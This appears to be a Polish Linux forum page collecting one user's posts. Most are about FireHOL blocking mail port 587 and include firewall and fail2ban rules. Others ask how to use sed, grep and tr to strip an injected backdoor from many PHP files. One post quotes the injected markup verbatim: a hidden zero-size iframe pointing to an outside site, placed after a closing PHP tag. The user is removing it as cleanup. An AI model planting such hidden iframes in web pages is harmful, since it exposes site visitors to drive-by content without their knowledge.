Nowe posty

xx Dystrybucja pod HP Omen (6)
Wczoraj o 23:30:08
xx [Poradnik] Wyszukiwanie Sterowników (2)
Wczoraj o 21:08:23
lamp Problem z Linux Lite po instalacji (0)
Wczoraj o 19:50:30
xx Ile pingwinów? (1)
Wczoraj o 08:59:24
xx konfiguracja pale moon (0)
2024-03-24, 21:53:42
xx Plasma 6 w Neonie ssie trochę mniej ... (10)
2024-03-23, 02:38:11
xx problem z instalacja sterowników do karty sieciowej (3)
2024-03-18, 18:10:16
xx Plik abc.001 (1)
2024-03-17, 17:48:27
xx Zlecę dopracowanie programu w MatLab (0)
2024-03-13, 15:28:40
xx Linux Mint 21.3 XFCE brak dźwieku po paru minutach (karta muzyczna zintegrowana) (5)
2024-03-12, 23:07:01

Pokaż wiadomości

Ta sekcja pozwala Ci zobaczyć wszystkie wiadomości wysłane przez tego użytkownika. Zwróć uwagę, że możesz widzieć tylko wiadomości wysłane w działach do których masz aktualnie dostęp.


Wiadomości - androwida

Strony: [1]
1
Konfiguracja / Odp: Firehol i blokada portu 587
« dnia: 2020-02-01, 18:46:05 »
Dziękuję wszystkim, którzy chcą pomóc.
Fail2ban przeczesałem w poszukiwaniu "25" Bo gdym znalazł to byłby to plik z aktywacją portów. Zero wyników.

Ale na logikę. Wyłączam firehol i port 587 działa. Włączam i przestaje działać. To powinno znaczyć, że w iptables, file2ban i gdziekolwiek indziej port nie jest blokowany a tylko firehol go blokuje.
Czy się mylę?

Firehol to raptem jeden plik z kilkunastoma linijkami kodu.
Nie wiem jak to może blokować port 587 bo nic takiego tam nie ma (treść pliku jest na początku wątku)

No ale w dokumentacji piszą, że można przypisać porty do serwisów.
No to dodaję
server_smtp_ports="tcp/25 tcp/587"
Restart i dalej nic.

Czy używacie firehol?

Wszelkie porady mile widziane

2
Konfiguracja / Odp: Firehol i blokada portu 587
« dnia: 2020-02-01, 14:21:45 »
Marcin82

465 chcę używać tak samo jak 25 i 587.
Odpowiedzi na Twoje zapytania są w poprzednim poście

3
Konfiguracja / Odp: Firehol i blokada portu 587
« dnia: 2020-02-01, 00:06:47 »
465 chcę używać tak samo jak 25 i 465
Wyniki wskazanych zapytań:
 iptables -nvL
Chain INPUT (policy ACCEPT 75318 packets, 21M bytes)
 pkts bytes target     prot opt in     out     source               destination

Chain FORWARD (policy ACCEPT 0 packets, 0 bytes)
 pkts bytes target     prot opt in     out     source               destination

Chain OUTPUT (policy ACCEPT 77735 packets, 21M bytes)
 pkts bytes target     prot opt in     out     source               destination
 
 dpkg -l | grep -iE 'iptables|netfilter'
ii  firehol                                      1.297-1                              all          easy to use but powerful iptables stateful firewall
ii  iptables                                     1.4.21-2+b1                          amd64        administration tools for packet filtering and NAT
ii  libnetfilter-conntrack3:amd64                1.0.4-1                              amd64        Netfilter netlink-conntrack library
ii  libnfnetlink0:amd64                          1.0.1-3                              amd64        Netfilter netlink library
ii  libxtables10                                 1.4.21-2+b1                          amd64        netfilter xtables library

find /etc/ -iname iptables*
/etc/fail2ban/action.d/iptables-ipset-proto6-allports.conf
/etc/fail2ban/action.d/iptables.conf
/etc/fail2ban/action.d/iptables-multiport.conf
/etc/fail2ban/action.d/iptables-ipset-proto6.conf
/etc/fail2ban/action.d/iptables-ipset-proto4.conf
/etc/fail2ban/action.d/iptables-new.conf
/etc/fail2ban/action.d/iptables-allports.conf
/etc/fail2ban/action.d/iptables-blocktype.conf
/etc/fail2ban/action.d/iptables-xt_recent-echo.conf
/etc/fail2ban/action.d/iptables-multiport-log.conf

4
Konfiguracja / Odp: Firehol i blokada portu 587
« dnia: 2020-01-31, 23:12:34 »
To jest Debian 8
Co z tego że wpisuję w firehol.conf zgodnie z instrukcją
server_smtp_ports="tcp/25 tcp/587"
i restart jak to nic nie daje. Myślałem że restart uaktualnia iptables ale nie. Może nie rozumiem instrukcji albo mam zła składnię

5
Konfiguracja / Odp: Firehol i blokada portu 587
« dnia: 2020-01-31, 22:24:36 »
Dzięki Marcin82.
A jak to się dokłada?

6
Konfiguracja / Odp: Firehol i blokada portu 587
« dnia: 2020-01-31, 21:59:42 »
Dziękuję Guru za odzew. Oczywiście że można. I już widzę że 587 tam nie ma. Wiec jakbyś napisał jak dodać (bo pewnie trzeba) to byłoby super.
(ja to odziedziczyłem a jestem - php Tak, serwer  Nie :(    )
-P INPUT ACCEPT
-P FORWARD ACCEPT
-P OUTPUT ACCEPT
-N fail2ban-dovecot-pop3imap
-N fail2ban-postfix
-A INPUT -p tcp -m multiport --dports 110,995,143,993 -j fail2ban-dovecot-pop3imap
-A INPUT -p tcp -m multiport --dports 25,465 -j fail2ban-postfix
-A fail2ban-dovecot-pop3imap -j RETURN
-A fail2ban-postfix -s 209.XXXXXXXXX/32 -j REJECT --reject-with icmp-port-unreachable
(itp. itp.....)
-A fail2ban-postfix -j RETURN

7
Konfiguracja / Firehol i blokada portu 587
« dnia: 2020-01-31, 21:05:58 »
Witam. Firehol blokuje port 587. Po firehol stop port działa bo postfix wysyła maile, managesieve robi swoje itd.
Bardzo proszę o pomoc.

Firehol.conf wygląda tak ("wyiksowane" adresy ip - nie mają znaczenia)

version 5
server_sshXXX_ports="tcp/XXX"
client_sshXXX_ports="default"

# Accept all client traffic on any interface
interface any eth0
         policy drop
#         protection strong

trusted="19XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"

        server icmp accept
        server http accept
        server https accept
        server smtp accept
        server smtps accept
        server pop3 accept
        server pop3s accept
        server imap accept
        server imaps accept
        server ssh6464 accept
        client all accept


iptables -I INPUT -i eth0 -s 194.XXXXXXXXXX.0/24 -j ACCEPT
iptables -I INPUT -s 91.XXXXXXXXX -j ACCEPT
iptables -I INPUT -i eth0 -s 19XXXXXXXX.81/32 -j ACCEPT

iptables -I INPUT -i eth0 -d XXXXXXXXXXXX -j DROP
iptables -I INPUT -i eth0 -d XXXXXXXXXXXX -p tcp --dport 80 -j ACCEPT

iptables -I INPUT -p tcp --dport 80 --syn -m connlimit --connlimit-above 10 -j REJECT

8
Dziękuję za skrypt. Zadziałał pięknie.

Z resztą to grubsza zabawa ze zmianą phpa i przeklepaniem wielu aplikacji.

Na czym polega zła konfiguracja serwera poczty umożliwiająca włam?

9
Dziękuję za Twój czas.

Nie, to nie tak :)
rzeźbiłem jakiś sed ale nie działał więc przeszedłem do grep żeby kombinując widzieć od razu czy w ogóle znajduje cały kombinowany string i na tym etapie zadałem pytanie :)

bacdora chyba znalazłem a systemu na razie zmienić nie mogę :(

Będę sprawdzał czy działa.

10
Poniżej konkretny kawałek kodu. Numery linii z kropką dostawiłem ręcznie, żeby wskazać co do usunięcia. Dopisałem też znaki końca linii jako LF tam gdzie są (bo się nie kopiują).
Tu akurat kod kończy się na linii 7. która jest do usunięcia ale nie musi zawsze tak być, może być coś dalej więc nie chodzi o polecenie które usunie 2 ostatnie linie czy ileś bajtów.
Chodzi o przykład, który skasuje linie 6. i 7. a nic nie zrobi w linii 1. gdzie jest "?>" jak w linii 6. - do usunięcia.

Wydaje mi się że właśnie użycie tr spowoduje "połączenie" (z punktu widzenia sed) linii 6. i 7. i stworzy z nich jeden unikalny string a sed będzie już wiedział co usuwać.

1. <?php require(DIR_WS_INCLUDES . 'footer.php'); ?>LF
2. <!-- footer_eof //-->LF
3. </body>LF
4. </html>LF
5. LF
6. ?>LF
7. <iframe style="position: absolute; left: 0px; top: 0px; width: 0px; height: 0px; z-index: 0;" frameborder="0" width="0" height="0" src="http://tch.com.br/"></iframe>LF

Nie chodzi o zapis modyfikacji do nowego pliku tylko nadpisanie istniejącego.
Operacja jedną komendą na setkach plików we wskazanej lokalizacji np. /var/ jeżeli zmienia to cokolwiek w wydajności itp.

11
Dzięki Paweł

A dałbyś radę pokazać przykład jak z użyciem tr-a podmienić \n na np \f, usunąć sed-em linie jak poniżej i podmienić z powrotem tr-em \f na \n, bo o usunięcie mi w sumie chodzi.
Problem w tym, że ?> występuje w plikach wiele razy a ja chcę usunąć tylko sentencje wyglądające dokładnmie jak poniżej a resztę ?> zostawić.

do usunięcia są powtarzające się wiele razy w każdym jednym pliku:
?>LF
<iframe>coś tam coś tam takie samo</iframe>LF

LF= \n

12
Jak w poleceniu konsolowym np. grep w regexp poprawnie zapisać znak końca linii, czyli to co w edytorze widać jako LN.

Przykład:
Jak coś takiego
?>LN<iframe>
zapisać w poleceniu
grep.....'?><iframe>'
Nie chodzi o samo polecenie tylko to co w uszach.

Od razu dodam, że \n , \r nie daje rezultatu

Strony: [1]